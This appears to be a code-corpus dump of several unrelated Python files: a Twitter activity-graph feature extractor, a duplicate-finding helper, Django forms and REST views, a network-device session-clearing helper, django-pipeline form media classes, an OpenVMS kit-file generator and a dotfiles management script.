        elif 'in_reply_to_status_id_str' in tweet and tweet['in_reply_to_status_id_str'] in tweets:
            # only consider replies that appear in the corpus
            # basic reply info
            replier = tweeter_id
            replied_to = tweet['in_reply_to_user_id_str']
            observed_user_ids.add(replied_to)
            replied_to_status = tweets[tweet['in_reply_to_status_id_str']]
            replied_to_status_ts = replied_to_status['created_at']
            posting_delay_sec = (utils.extract_ts_s(replied_to_status_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
            add_edge(
                g, replier, replied_to, tweet_id, tweet_ts, 'REPLY',
                original_tweet_id=tweet['in_reply_to_status_id_str'],
                original_tweet_ts=replied_to_status_ts,
                posting_delay_sec=posting_delay_sec
            )
            # in conversation
            if tweet['in_reply_to_status_id_str'] in tweets:
                # follow the reply chain as far as we can
                conversation_root = root_of_conversation(tweet['in_reply_to_status_id_str'], tweets)
                # conversation_root MAY NOT be in the corpus - it's still a link though
                # Fall back to the collection start time when the root tweet
                # itself is outside the corpus.
                conv_root_ts = first_tweet_ts_str
                posting_delay_sec = (utils.ts_2_epoch_seconds(first_tweet_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
                if conversation_root in tweets:
                    observed_user_ids.add(tweets[conversation_root]['user']['id_str'])
                    conv_root_ts = tweets[conversation_root]['created_at']
                    posting_delay_sec = (utils.extract_ts_s(conv_root_ts) - utils.extract_ts_s(tweet_ts))#.total_seconds()
                add_edge(
                    g, replier, conversation_root, tweet_id, tweet_ts, 'IN_CONVERSATION',
                    original_tweet_id=conversation_root,
                    original_tweet_ts=conv_root_ts,
                    posting_delay_sec=posting_delay_sec
                )
    return g
# Verbose-logging flag; flipped on by the -v command-line option in __main__.
DEBUG = False

def log(msg):
    """Emit msg via eprint, but only when verbose logging is enabled."""
    if not DEBUG:
        return
    eprint(msg)
if __name__ == '__main__':
    # Parse CLI options; --verbose toggles the module-level DEBUG flag.
    options = Options()
    opts = options.parse(sys.argv[1:])
    DEBUG=opts.verbose
    # users: node_id -> CSV row dict; communities: community_id -> [node_id].
    users = {}
    communities = defaultdict(lambda: [], {})
    with open(opts.ids_file, 'r', encoding='utf-8') as f:
        csv_reader = csv.DictReader(f, delimiter=',', quotechar='"')
        for row in csv_reader:
            # Copy the DictReader row into a plain dict.
            r = {}
            for key in row: # range(len(row)):
                r[key] = row[key]
            users[r['node_id']] = r
            communities[r['community_id']].append(r['node_id'])
            # users[r[0]] = r
    # Bucket tweets per known user; track the overall collection window.
    tweets = dict([(uid, []) for uid in users.keys()])
    earliest_ts = sys.maxsize
    latest_ts = 0
    # with open(opts.tweets_file, 'r', encoding='utf-8') as f:
    # Transparently read gzipped corpora (filename ending in z/Z).
    f = gzip.open(opts.tweets_file, 'rt') if opts.tweets_file[-1] in 'zZ' else open(opts.tweets_file, 'r', encoding='utf-8')
    for l in f:
        tweet = json.loads(l.strip())
        tweet['ts'] = utils.extract_ts_s(tweet['created_at']) # timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
        if tweet['ts'] < earliest_ts: earliest_ts = tweet['ts']
        if tweet['ts'] > latest_ts: latest_ts = tweet['ts']
        user_id = tweet['user']['id_str']
        # Keep only tweets authored by users present in the ids file.
        if user_id in users.keys():
            # tweet['ts'] = timestamp_2_epoch_seconds(parse_ts(tweet['created_at']))
            tweets[user_id].append(tweet)
    f.close()
    collection_period_mins = (latest_ts - earliest_ts) / 60
    # Per-user feature vectors over the user's chronologically sorted tweets.
    user_feature_vectors = {}
    for user_id in tweets:
        tweets[user_id].sort(key=lambda t: t['ts'])
        user_feature_vectors[user_id] = build_user_feature_vector(user_id, tweets[user_id], collection_period_mins)
    # Per-community feature vectors built from each community's activity graph.
    community_feature_vectors = {}
    for community_id in communities:
        # community_tweets: tweet id_str -> tweet, deduplicated across members.
        community_tweets = {}
        community = communities[community_id]
        for user_id in community:
            for t in tweets[user_id]:
                community_tweets[t['id_str']] = t
        # community_tweets += tweets[user_id]
        # community_tweets.sort(key=lambda t: t['ts'])
        # build activity graph from tweets
        g = build_activity_graph(community_tweets, earliest_ts)
        # build feature vector from activity graph
        community_feature_vectors[community_id] = build_community_feature_vector(community, g)
    # Emit a CSV: label, user features, HCC degree, community id, community features.
    header = ','.join(map(str, ['Label'] + USER_FEATURES + ['U_prop_hcc_degree', 'community_id'] + COMMUNITY_FEATURES))
    print(header)
    for user_id in tweets:
        user_vector = user_feature_vectors[user_id]
        hcc_prop_degree = users[user_id]['proportional_degree']
        community_id = users[user_id]['community_id']
        community_vector = community_feature_vectors[community_id]
        print(','.join([
            opts.label,
            mk_feature_str(USER_FEATURES, user_vector),
            hcc_prop_degree,
            community_id,
            mk_feature_str(COMMUNITY_FEATURES, community_vector)
        ]))
    # print('%s: %s %s' % (user_id, str(user_feature_vectors[user_id]), str()))
| 2.453125 | 2 |
def firstDuplicate(a):
    """Return the element of *a* whose second occurrence has the smallest
    index, or -1 if no element occurs more than once.

    Single pass with a set of already-seen values: the first value we meet
    that is already in the set is, by construction, the duplicate whose
    second occurrence comes earliest. O(n) time and space with early exit,
    replacing the original's two-dict, three-loop bookkeeping.
    """
    seen = set()
    for value in a:
        if value in seen:
            return value
        seen.add(value)
    return -1
| 3.46875 | 3 |
src/viewer/abs/forms.py | ozacas/asxtrade | 8 | 17683 | <gh_stars>1-10
from django import forms
from django.core.exceptions import ValidationError
from abs.models import dataflows
class ABSDataflowForm(forms.Form):
    """Form presenting a required choice of ABS dataflows.

    The choice list is populated at instantiation time (not class definition
    time) so it reflects the dataflows currently available.
    """
    dataflow = forms.ChoiceField(choices=(), required=True)

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        flow_choices = [(flow.abs_id, flow.name) for flow in dataflows()]
        self.fields["dataflow"].choices = flow_choices
| 2.375 | 2 |
pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py | patrickboertje/genielibs | 1 | 17684 | <reponame>patrickboertje/genielibs<filename>pkgs/sdk-pkg/src/genie/libs/sdk/apis/iosxe/dot1x/clear.py
# Python
import logging
# Unicon
from unicon.core.errors import SubCommandFailure
# Logger
log = logging.getLogger(__name__)
def clear_access_session_intf(device, intf):
    """ clear access-session interface {}
        Args:
            device (`obj`): Device object
            intf('str'): Name of the interface to clear access-session
        Returns:
            None
        Raises:
            SubCommandFailure
    """
    command = 'clear access-session interface {intf}'.format(intf=intf)
    try:
        device.execute(command)
    except SubCommandFailure as e:
        # Wrap the low-level failure with device context for the caller.
        message = (
            "Could not clear access-session interface on {device}. Error:\n{error}"
            .format(device=device, error=e)
        )
        raise SubCommandFailure(message)
| 2.078125 | 2 |
pipeline/forms.py | jnis77diver/django-pipeline | 0 | 17685 | <filename>pipeline/forms.py
"""Support for referencing Pipeline packages in forms and widgets."""
from __future__ import unicode_literals
from django.contrib.staticfiles.storage import staticfiles_storage
from django.utils.functional import cached_property
# Compatibility shim: use Django's bundled six helpers when present; on
# Django >= 3 (which dropped django.utils.six) fall back to a local
# add_metaclass and a py3-style iteritems.
try:
    from django.utils.six import iteritems, add_metaclass
except ImportError:
    from .decorator import add_metaclass

    def iteritems(dictionary):
        """Iterate over (key, value) pairs of *dictionary* (py2/py3 shim)."""
        return dictionary.items()
from .collector import default_collector
from .conf import settings
from .packager import Packager
class PipelineFormMediaProperty(object):
    """A property that converts Pipeline packages to lists of files.
    This is used behind the scenes for any Media classes that subclass
    :py:class:`PipelineFormMedia`. When accessed, it converts any Pipeline
    packages into lists of media files and returns or forwards on lookups to
    that list.
    """
    def __init__(self, get_media_files_func, media_cls, extra_files):
        """Initialize the property.
        Args:
            get_media_files_func (callable):
                The function to call to generate the media files.
            media_cls (type):
                The Media class owning the property.
            extra_files (object):
                Files listed in the original ``css`` or ``js`` attribute on
                the Media class.
        """
        self._get_media_files_func = get_media_files_func
        self._media_cls = media_cls
        self._extra_files = extra_files
    @cached_property
    def _media_files(self):
        """The media files represented by the property.
        Computed lazily on first access and memoized on this property
        object (which is shared by the owning Media class).
        """
        return self._get_media_files_func(self._media_cls, self._extra_files)
    def __get__(self, *args, **kwargs):
        """Return the media files when accessed as an attribute.
        This is called when accessing the attribute directly through the
        Media class (for example, ``Media.css``). It returns the media files
        directly.
        Args:
            *args (tuple, unused):
                Unused positional arguments.
            **kwargs (dict, unused):
                Unused keyword arguments.
        Returns:
            object:
                The list or dictionary containing the media files definition.
        """
        return self._media_files
    def __getattr__(self, attr_name):
        """Return an attribute on the media files definition.
        This is called when accessing an attribute that doesn't otherwise
        exist in the property's dictionary. The call is forwarded onto the
        media files definition.
        Args:
            attr_name (unicode):
                The attribute name.
        Returns:
            object:
                The attribute value.
        Raises:
            AttributeError:
                An attribute with this name could not be found.
        """
        return getattr(self._media_files, attr_name)
    def __iter__(self):
        """Iterate through the media files definition.
        This is called when attempting to iterate over this property. It
        iterates over the media files definition instead.
        Yields:
            object:
                Each entry in the media files definition.
        """
        return iter(self._media_files)
class PipelineFormMediaMetaClass(type):
    """Metaclass for the PipelineFormMedia class.
    This is responsible for converting CSS/JavaScript packages defined in
    Pipeline into lists of files to include on a page. It handles access to the
    :py:attr:`css` and :py:attr:`js` attributes on the class, generating a
    list of files to return based on the Pipelined packages and individual
    files listed in the :py:attr:`css`/:py:attr:`css_packages` or
    :py:attr:`js`/:py:attr:`js_packages` attributes.
    """
    def __new__(cls, name, bases, attrs):
        """Construct the class.
        Args:
            name (bytes):
                The name of the class.
            bases (tuple):
                The base classes for the class.
            attrs (dict):
                The attributes going into the class.
        Returns:
            type:
                The new class.
        """
        new_class = super(PipelineFormMediaMetaClass, cls).__new__(
            cls, name, bases, attrs)
        # If we define any packages, we'll need to use our special
        # PipelineFormMediaProperty class. We use this instead of intercepting
        # in __getattribute__ because Django does not access them through
        # normal property access. Instead, grabs the Media class's __dict__
        # and accesses them from there. By using these special properties, we
        # can handle direct access (Media.css) and dictionary-based access
        # (Media.__dict__['css']).
        if 'css_packages' in attrs:
            new_class.css = PipelineFormMediaProperty(
                cls._get_css_files, new_class, attrs.get('css') or {})
        if 'js_packages' in attrs:
            new_class.js = PipelineFormMediaProperty(
                cls._get_js_files, new_class, attrs.get('js') or [])
        return new_class
    def _get_css_files(cls, extra_files):
        """Return all CSS files from the Media class.
        Args:
            extra_files (dict):
                The contents of the Media class's original :py:attr:`css`
                attribute, if one was provided.
        Returns:
            dict:
                The CSS media types and files to return for the :py:attr:`css`
                attribute.
        """
        packager = Packager()
        css_packages = getattr(cls, 'css_packages', {})
        # One entry per media target (e.g. 'all', 'print'), merging the
        # target's package output with any hand-listed extra files.
        return dict(
            (media_target,
             cls._get_media_files(packager=packager,
                                  media_packages=media_packages,
                                  media_type='css',
                                  extra_files=extra_files.get(media_target,
                                                              [])))
            for media_target, media_packages in iteritems(css_packages)
        )
    def _get_js_files(cls, extra_files):
        """Return all JavaScript files from the Media class.
        Args:
            extra_files (list):
                The contents of the Media class's original :py:attr:`js`
                attribute, if one was provided.
        Returns:
            list:
                The JavaScript files to return for the :py:attr:`js` attribute.
        """
        return cls._get_media_files(
            packager=Packager(),
            media_packages=getattr(cls, 'js_packages', {}),
            media_type='js',
            extra_files=extra_files)
    def _get_media_files(cls, packager, media_packages, media_type,
                         extra_files):
        """Return source or output media files for a list of packages.
        This will go through the media files belonging to the provided list
        of packages referenced in a Media class and return the output files
        (if Pipeline is enabled) or the source files (if not enabled).
        Args:
            packager (pipeline.packager.Packager):
                The packager responsible for media compilation for this type
                of package.
            media_packages (list of unicode):
                The list of media packages referenced in Media to compile or
                return.
            media_type (unicode):
                The media type being looked up: ``'css'`` or ``'js'``.
            extra_files (list of unicode):
                The list of extra files to include in the result. This would
                be the list stored in the Media class's original :py:attr:`css`
                or :py:attr:`js` attributes.
        Returns:
            list:
                The list of media files for the given packages.
        """
        source_files = list(extra_files)
        # When Pipeline itself is off but collection is on, make sure static
        # files have been collected before compiling source paths.
        if (not settings.PIPELINE_ENABLED and
            settings.PIPELINE_COLLECTOR_ENABLED):
            default_collector.collect()
        for media_package in media_packages:
            package = packager.package_for(media_type, media_package)
            if settings.PIPELINE_ENABLED:
                # Production mode: reference the single compiled output file.
                source_files.append(
                    staticfiles_storage.url(package.output_filename))
            else:
                # Development mode: reference each compiled source path.
                source_files += packager.compile(package.paths)
        return source_files
@add_metaclass(PipelineFormMediaMetaClass)
class PipelineFormMedia(object):
    """Base class for form or widget Media classes that use Pipeline packages.
    Forms or widgets that need custom CSS or JavaScript media on a page can
    define a standard :py:class:`Media` class that subclasses this class,
    listing the CSS or JavaScript packages in :py:attr:`css_packages` and
    :py:attr:`js_packages` attributes. These are formatted the same as the
    standard :py:attr:`css` and :py:attr:`js` attributes, but reference
    Pipeline package names instead of individual source files.
    If Pipeline is enabled, these will expand to the output files for the
    packages. Otherwise, these will expand to the list of source files for the
    packages.
    Subclasses can also continue to define :py:attr:`css` and :py:attr:`js`
    attributes, which will be returned along with the other output/source
    files.
    Example:
        from django import forms
        from pipeline.forms import PipelineFormMedia
        class MyForm(forms.Form):
            ...
            class Media(PipelineFormMedia):
                css_packages = {
                    'all': ('my-form-styles-package',
                            'other-form-styles-package'),
                    'print': ('my-form-print-styles-package',),
                }
                js_packages = ('my-form-scripts-package',)
                js = ('some-file.js',)
    """
| 2.328125 | 2 |
api_user/views.py | archkwon/python-django-restful-mysql | 0 | 17686 | from django.http import QueryDict
from django.http.response import JsonResponse
from rest_framework import viewsets, status
from rest_framework.views import APIView
from .serializers import *
class UserInfoViewSet(viewsets.ModelViewSet):
    """CRUD endpoints for UserInfoModel, optionally filtered by ``user_id``."""
    queryset = UserInfoModel.objects.all()
    serializer_class = UserInfoSerializer

    def get_queryset(self):
        """Return all users, narrowed to ``user_id`` when that query param is set.

        Bug fix: the original called ``queryset.get(user_id=user_id)`` and
        discarded the result, so the parameter had no filtering effect (and an
        unknown id raised DoesNotExist). ``filter`` narrows the queryset and
        simply yields an empty result set for unknown ids.
        """
        queryset = super().get_queryset()
        user_id = self.request.query_params.get('user_id', '')
        if user_id:
            queryset = queryset.filter(user_id=user_id)
        return queryset
class UserInfoSessionView(APIView):
    """Read-only endpoint returning a single user's info, looked up by the
    ``user_id`` query parameter."""

    # noinspection PyMethodMayBeStatic
    def get(self, request, *args, **kwargs):
        target_id = request.GET['user_id']
        record = UserInfoModel.objects.get(user_id=target_id)
        payload = UserInfoSerializer(record).data
        return JsonResponse(
            {
                'code': True,
                'status': status.HTTP_200_OK,
                'response': payload,
                'message': 'SEARCH_SUCCESS',
            },
            status=status.HTTP_200_OK,
        )
# Update a user's login (device) token.
class UpdateTokenAction(APIView):
    """PUT endpoint that stores a new ``device_token`` for an existing user."""

    # noinspection PyMethodMayBeStatic
    def put(self, request):
        params = QueryDict(request.body)
        user_id = params.get('user_id')
        device_token = params.get('device_token')
        if UserInfoModel.objects.filter(user_id=user_id).exists():
            record = UserInfoModel.objects.get(user_id=user_id)
            record.device_token = device_token
            record.save()
            return JsonResponse(
                {
                    'code': True,
                    'status': status.HTTP_200_OK,
                    'message': 'UPDATE_SUCCESS',
                },
                status=status.HTTP_200_OK,
            )
        # Unknown user: HTTP 200 with code=False, matching the existing API
        # contract (clients check 'code', not the HTTP status).
        return JsonResponse(
            {
                'code': False,
                'status': status.HTTP_200_OK,
                'message': 'FAIL',
            },
            status=status.HTTP_200_OK,
        )
vms/create_kit_files.py | vmssoftware/python_3_8_2 | 3 | 17687 | import os
import re
import sys
def spec_replacer(match):
    """re.sub callback: VMS-escape one special character.

    A space becomes ``^_``; every other matched character is prefixed
    with ``^``.
    """
    ch = match.group(0)
    return '^_' if ch == ' ' else '^' + ch
def create_content(type, major, minor, level, edit):
    """Write the PCSI kit description (python.pcsi$desc) and text
    (python.pcsi$text) files for a VSI Python OpenVMS kit.

    Walks the installed tree under /python$root, VMS-escapes special
    characters in names via spec_replacer, and substitutes the directory and
    file statements into the PCSI templates along with the version fields.
    NOTE(review): *type* shadows the builtin; kept for interface stability.
    """
    python_dir = '/python$root'
    python_dir_len = len(python_dir)
    all_dirs = []
    all_files = []
    # Characters PCSI requires escaping for; see spec_replacer.
    spec_pattern = re.compile('([. ^+()])')
    for root, dirs, files in os.walk(python_dir):
        # Convert the POSIX-style relative path into VMS [python.a.b] syntax.
        inner_dirs = list(filter(lambda x: x != '', spec_pattern.sub(spec_replacer, root[python_dir_len:]).split('/')))
        kit_dir = '[' + '.'.join(['python'] + inner_dirs) + ']'
        all_dirs.append('directory "' + kit_dir + '" version limit 1;')
        for file in files:
            file_name, file_ext = os.path.splitext(file)
            # Extensionless files get a bare '.' so the VMS name is valid.
            if file_ext == '':
                file_ext = '.'
            file_name = spec_pattern.sub(spec_replacer, file_name)
            all_files.append('file "' + \
                kit_dir + file_name + file_ext + \
                '" source "' + \
                kit_dir + file_name + file_ext + \
                '";')
        # try:
        #     dirs.remove('__pycache__')
        # except:
        #     pass
    kit_template = '''--
-- (C) Copyright 2021 VMS Software Inc.
--
product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} FULL ;
--
-- Execute the preconfigure procedure
--
execute preconfigure "@pcsi$source:[python]python$pcsi_preconfigure.com" uses [python]python$pcsi_preconfigure.com ;
--
-- Make sure VMS V8.4 or above is installed
--
if ((not <software VSI I64VMS VMS version minimum V8.4>) and (not <software HP I64VMS VMS version minimum V8.4>)) ;
    error NO_MIN_VMS abort ;
end if ;
--
-- ODS-5 Disk(s) should be available on this system
--
if (<logical name PYTHON$ODS5_AVAIL equals 0 table LNM$JOB>) ;
    error NO_ODS5_DISKS ;
end if ;
--
-- Directories...
--
{dirs}
--
-- Files...
--
{files}
--
-- Start-up and shutdown scripts
--
file "[sys$startup]python$define_root.com" source "[python]python$define_root.com";
file "[sys$startup]python$startup.com" source "[python]python$startup.com";
file "[sys$startup]python$shutdown.com" source "[python]python$shutdown.com";
--
-- Release notes
--
-- (none)
--
-- Do post-install tasks
--
execute postinstall "@pcsi$source:[python]python$define_root.com" interactive uses "[python]python$define_root.com" ;
--
-- Okay, done. Tell the user what to do next.
--
information POST_INSTALL phase after with helptext;
--
-- All done
--
end product;
'''
    # type, major, minor, level, edit must be the same as in pythlib.pcsi$text
    kit_content = kit_template.format(
        type=type,
        major=major,
        minor=minor,
        level=level,
        edit=edit,
        dirs='\n    '.join(all_dirs),
        files='\n    '.join(all_files))
    with open('python.pcsi$desc', 'w') as file:
        file.write(kit_content)
    # NOTE(review): "instalation" typo below is preserved verbatim — it is
    # runtime kit text, not a comment.
    text_template = '''=product VSI I64VMS PYTHON {type}{major}.{minor}-{level}{edit} full
1 'PRODUCT
=prompt Python for OpenVMS is based on Python Version 3.8.2
1 'PRODUCER
=prompt VSI Software Inc.
1 'NOTICE
=prompt (C) Copyright 2021 VMS Software Inc.
1 NO_MIN_VMS
=prompt Minimum OpenVMS software version not found on this system, abort instalation
This kit requires a minimum of OpenVMS I64 V8.4.
1 NO_ODS5_DISKS
=prompt ODS-5 disk(s) not found on this system, abort installation
This kit requires an ODS-5 disk to be correctly installed in this system.
1 POST_INSTALL
=prompt Post-installation tasks are required.
To define the Python runtime at system boot time, add the
following lines to SYS$MANAGER:SYSTARTUP_VMS.COM:
    $ file := SYS$STARTUP:PYTHON$STARTUP.COM
    $ if f$search("''file'") .nes. "" then @'file'
To shutdown the Python runtime at system shutdown time, add the
following lines to SYS$MANAGER:SYSHUTDWN.COM:
    $ file := SYS$STARTUP:PYTHON$SHUTDOWN.COM
    $ if f$search("''file'") .nes. "" then @'file'
'''
    text_content = text_template.format(
        type=type,
        major=major,
        minor=minor,
        level=level,
        edit=edit,
        dirs='\n    '.join(all_dirs),
        files='\n    '.join(all_files))
    with open('python.pcsi$text', 'w') as file:
        file.write(text_content)
if __name__ == "__main__":
import getopt
import datetime
opts, args = getopt.getopt(sys.argv[1:], '', ['type=', 'major=', 'minor=', 'level=', 'edit='])
type = 'F'
major = '3'
minor = '8'
level = '2'
edit = '' # 'd' + datetime.date.today().strftime('%Y%m%d')
for opt, optarg in opts:
if opt in ['--type']:
type = optarg
elif opt in ['--major']:
major = optarg
elif opt in ['--minor']:
minor = optarg
elif opt in ['--level']:
level = optarg
elif opt in ['--edit']:
edit = optarg
else:
print('Unknown option %s' % opt)
create_content(
type,
major,
minor,
level,
edit,
)
| 2.375 | 2 |
dotfiles/config/feltnerm/bin/dots.py | feltnerm/dotfiles | 4 | 17688 | <reponame>feltnerm/dotfiles
#!/usr/bin/env python
# .py
# @TODO:
# - fix the diffing
# - use rsync across hosts or something fancy
import argparse, difflib, functools, re, shutil, subprocess, sys, time, os
from pprint import pprint
__description__ = "Manage your dotfiles."
# PEP 8 (E731): named lambdas replaced with plain defs; call signatures and
# behavior are unchanged.
def ls(path):
    """Return the entry names in *path* (thin wrapper over os.listdir)."""
    return os.listdir(path)

def ls_abs(path):
    """Return the entries of *path*, each joined onto *path*."""
    return [os.path.join(path, x) for x in os.listdir(path)]

def ln(src, dst):
    """Create a symlink at *dst* pointing to *src*."""
    return os.symlink(src, dst)

def unlink(src):
    """Remove the symlink (or file) at *src*."""
    return os.unlink(src)
def rm(path):
    """Remove *path*: rmdir for directories, remove otherwise.

    Errors (missing path, non-empty directory, permissions) are printed
    rather than raised, matching the script's best-effort cleanup style.
    """
    try:
        if os.path.isdir(path):
            os.rmdir(path)
        else:
            os.remove(path)
    except OSError as e:  # `except OSError, e` modernized; valid on py2.6+ too
        print(e)
def diff(fromfile, tofile):
    """Return a unified diff (iterable of lines) between two files.

    Bug fix: the original implicitly returned None when *tofile* did not
    exist, which made the caller's ``sys.stdout.writelines(diff(...))``
    raise TypeError. Return an empty iterator instead so the result is
    always safe to iterate.
    """
    if not os.path.exists(tofile):
        return iter(())
    fromdate = time.ctime(os.stat(fromfile).st_mtime)
    todate = time.ctime(os.stat(tofile).st_mtime)
    fromlines = open(fromfile, 'U').readlines()
    tolines = open(tofile, 'U').readlines()
    return difflib.unified_diff(fromlines, tolines,
                                fromfile, tofile, fromdate, todate)
def parse_args(argv):
    """Build the dots.py argument parser and parse *argv* (no program name)."""
    home = os.getenv("HOME")
    defaults = {
        'source_dir': os.path.join(home, "dotfiles"),
        'dest_dir': os.path.join(home),
    }
    parser = argparse.ArgumentParser(prog='dots.py',
                                     description=__description__)
    parser.add_argument("-d", "--dest-dir", default=defaults['dest_dir'],
                        help="Directory to process source files to.")
    parser.add_argument("-e", "--exclude", help="Regex of files to exclude")
    parser.add_argument("-f", "--force",
                        help="Force the operation to continue.")
    parser.add_argument("-i", "--interactive", default=False,
                        action='store_true', help="Run interactively.")
    parser.add_argument("-l", "--list-commands", default=False,
                        action='store_true',
                        help="List the possible commands.")
    parser.add_argument("-n", "--dry-run", default=False, action='store_true',
                        help="Dry run.")
    parser.add_argument("--no-dot",
                        help="Comma-separated list of files to not append a '.' to")
    parser.add_argument("-s", "--source-dir", default=defaults['source_dir'],
                        help="Directory to process source files from.")
    parser.add_argument("-v", "--version", default=False, action='store_true',
                        help="Print the version.")
    parser.add_argument("-V", "--verbose", default=False, action='store_true',
                        help="Verbose mode.")
    parser.add_argument("commands", nargs="*", help="Command to run.")
    return parser.parse_args(argv)
def ask(msg):
    """Prompt the user with *msg* until they answer y or n; True for yes."""
    answer = raw_input(msg + " [Y]/n?").lower()
    while answer not in ('y', 'n'):
        answer = raw_input(msg + " [Y]/n?").lower()
    return answer == 'y'
#
# dotfiles command API
#
class Dotfiles(object):
    """Manages linking, diffing, cleaning and updating dotfiles between a
    source directory (the repo) and a destination directory ($HOME).

    Command methods are named ``cmd_<name>`` and dispatched via run().
    """
    def __init__(self, opts):
        # Baseline option values; CLI-provided truthy opts override below.
        self.options = {
            "exclude": [
                r'^\.'
            ],
            "exclude_list": [
                'README.md',
                'LICENSE',
                'dots.py',
            ],
            "nodot_list": ['bin']
        }
        for key in opts.keys():
            if opts.get(key, None):
                self.options[key] = (opts.get(key))
        # Look for the source and destination directories
        self.src = self.options.get('source_dir', None)
        self.dst = self.options.get('dest_dir', None)
        if not (os.path.isdir(self.src) and os.path.isdir(self.dst)):
            raise Exception("BAD PATH: <Source: %s> <Dest: %s>" %
                (self.src, self.dst))
        # Process files which to not add a '.' to
        _nodot = self.options.get('nodot', None)
        if _nodot:
            if "," in _nodot:
                self.options['nodot_list'].extend(_nodot.split(','))
            else:
                self.options['nodot_list'].append(_nodot)
        # Process regex for excluding files
        # NOTE(review): a CLI --exclude replaces the default *list* with a
        # *string*; this loop then iterates the string character by
        # character — likely a bug. Confirm intended --exclude semantics.
        _re_excludes = self.options.get('exclude', None)
        if _re_excludes:
            for _re_exclude in _re_excludes:
                _re_exclude = _re_exclude.decode('string_escape')
                re_exclude = re.compile(_re_exclude)
                self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
        #_re_exclude = self.options.get('exclude', None)
        #if _re_exclude:
        #    _re_exclude = _re_exclude.decode('string_escape')
        #    re_exclude = re.compile(_re_exclude)
        #    self.options['exclude_list'].extend(filter(lambda x: re_exclude.match(x), ls(self.src)))
        # Pre-process (cache) these files for quick access
        #self.source_files = self._nodots(self._exclude(ls(self.src))()
        self.source_files = self._exclude(ls(self.src))()
        self.dest_files = ls(self.dst)
        self.verbose = self.options.get('verbose')
        self.interactive = self.options.get('interactive')
        self.dry_run = self.options.get('dry_run')
        if self.options.get('verbose', False):
            pprint(self.options)
    @property
    def commands(self):
        """All available command method names (the ``cmd_*`` attributes)."""
        return filter(lambda method: method.startswith('cmd_'), dir(self))
    def _nodots(self, l):
        # Return a deferred map that strips the leading '.' from names
        # listed in nodot_list (currently unused; see commented line above).
        def map_func(x):
            return x.lstrip('.') if x in self.options['nodot_list'] else x
        return functools.partial(map, map_func, l)
    def _exclude(self, l):
        # Return a deferred filter dropping names present in exclude_list.
        def filter_func(x):
            return x not in [os.path.basename(a) for a in self.options['exclude_list']]
        return functools.partial(filter, filter_func, l)
    def _execute(self, cmd, func):
        # NOTE(review): in dry-run mode this still calls func() — the
        # assignment to self.func probably meant `func = None`, so dry runs
        # are not actually dry. Confirm and fix.
        if self.dry_run:
            self.verbose = True
            self.func = None
        if self.verbose:
            print("# Execute: %s" % cmd)
        if func:
            func()
    def run(self, command):
        """Dispatch *command* to its ``cmd_<command>`` method, if any."""
        cmd = 'cmd_' + command
        if hasattr(self, cmd):
            func = getattr(self, cmd)
            if callable(func):
                try:
                    self._execute(cmd, func)
                except Exception, e:
                    print(e)
    #
    # Commands API
    #
    def cmd_init(self):
        """ Task to initialize dotfiles in your $HOME for the first time. """
        print(">> Initing ...")
        commands = ['update', 'diff', 'link']
        for cmd in commands:
            self.run(cmd)
    def cmd_diff(self):
        """ Show the differences between $DOTFILES and $HOME. """
        print(">> Diffing ...")
        for from_file in self.source_files:
            fromfile = os.path.join(self.options.get('source_dir'), from_file)
            if not os.path.isdir(fromfile):
                #to_file = os.path.join(self.options.get('dest_dir', from_file))
                tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
                sys.stdout.writelines(diff(fromfile, tofile))
    def cmd_link(self):
        """ Link files in $DOTFILES to corresponding files in $HOME. """
        print(">> Linking ...")
        for from_file in self.source_files:
            fromfile = os.path.join(self.options.get('source_dir'), from_file)
            tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
            nodeExists = os.path.lexists(tofile)
            if nodeExists:
                print("\nFile %s exists already!" % tofile)
                if self.options.get('force', False):
                    if self.interactive:
                        if ask("Link %s->%s" % (fromfile, tofile)):
                            if self.verbose:
                                print("rm(%s)" % (tofile))
                                print("ln(%s, %s)" % (fromfile, tofile))
                            # NOTE(review): the islink branch removes the old
                            # link but never re-creates it (no ln call) —
                            # looks like a bug; confirm intended behavior.
                            if os.path.islink(tofile):
                                unlink(tofile)
                            elif os.path.isdir(tofile):
                                shutil.rmtree(tofile)
                                ln(fromfile, tofile)
                            else:
                                rm(tofile)
                                ln(fromfile, tofile)
                    else:
                        if self.verbose:
                            print("rm(%s)" % (tofile))
                            print("ln(%s, %s)" % (fromfile, tofile))
                        rm(tofile)
                        ln(fromfile, tofile)
            else:
                if self.interactive:
                    if ask("Link %s->%s" % (fromfile, tofile)):
                        if self.verbose:
                            print("ln(%s, %s)" % (fromfile, tofile))
                        ln(fromfile, tofile)
                else:
                    if self.verbose:
                        print("ln(%s, %s)" % (fromfile, tofile))
                    ln(fromfile, tofile)
    def cmd_clean(self):
        """ Clean the dotfiles in $HOME. """
        print(">> Cleaning ...")
        for from_file in self.source_files:
            fromfile = os.path.join(self.options.get('source_dir'), from_file)
            tofile = os.path.join(self.options.get('dest_dir'), "." + from_file)
            if os.path.lexists(tofile):
                if self.verbose:
                    print("rm(%s)" % tofile)
                rm(tofile)
    def cmd_update(self):
        """ Update dotfiles and dependencies in $HOME with latest
        in the repo(s). """
        print(">> Updating ...")
        cmd = "cd %s; git pull" % self.options.get('source_dir')
        output = subprocess.check_output(
            cmd,
            stderr=subprocess.STDOUT,
            shell=True)
        print(output)
    def cmd_status(self):
        """ Status of $DOTFILES. """
        print(">> Status: ")
        cmd = "cd %s; git status" % self.options.get('source_dir')
        output = subprocess.check_output(
            cmd,
            stderr=subprocess.STDOUT,
            shell=True)
        print(output)
def run(commands, opts):
    """Instantiate Dotfiles and dispatch each requested command.

    With no commands (or --list-commands), print each available command
    name and its docstring instead.
    """
    dotfiles = Dotfiles(opts)
    if not opts['commands'] or opts['list_commands']:
        for cmd in dotfiles.commands:
            print(cmd.split("_")[1] + ":")
            print(getattr(getattr(dotfiles, cmd), '__doc__'))
    else:
        for command in commands:
            dotfiles.run(command)
#
# main
#
def main(argv=None):
    """CLI entry point: parse *argv*, run the requested commands, return 0."""
    parsed = parse_args(argv)
    run(parsed.commands, vars(parsed))
    return 0  # success
if __name__ == '__main__':
    # Propagate main()'s status code to the shell.
    status = main()
